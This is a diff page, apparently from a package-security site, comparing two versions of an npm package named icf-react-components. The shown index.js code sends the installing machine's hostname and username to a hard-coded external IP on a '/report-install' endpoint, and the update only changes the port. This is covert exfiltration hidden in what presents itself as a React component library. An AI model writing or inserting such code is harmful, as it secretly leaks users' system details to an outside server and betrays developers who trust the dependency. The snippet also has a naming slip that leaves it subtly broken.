icf-react-components 1.0.1 → 1.0.2
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -2,7 +2,7 @@ const https = require('http'); // Use http instead of https for non-SSL setup
|
|
2
2
|
|
3
3
|
// Replace 'YOUR_VPS_IP' with your actual VPS IP address
|
4
4
|
const vpsIp = '62.171.155.146';
|
5
|
-
const port =
|
5
|
+
const port = 54333;
|
6
6
|
|
7
7
|
http.get(`http://${vpsIp}:${port}/report-install?host=${process.env.HOSTNAME}&user=${process.env.USER}`, (resp) => {
|
8
8
|
console.log('Notification sent');
|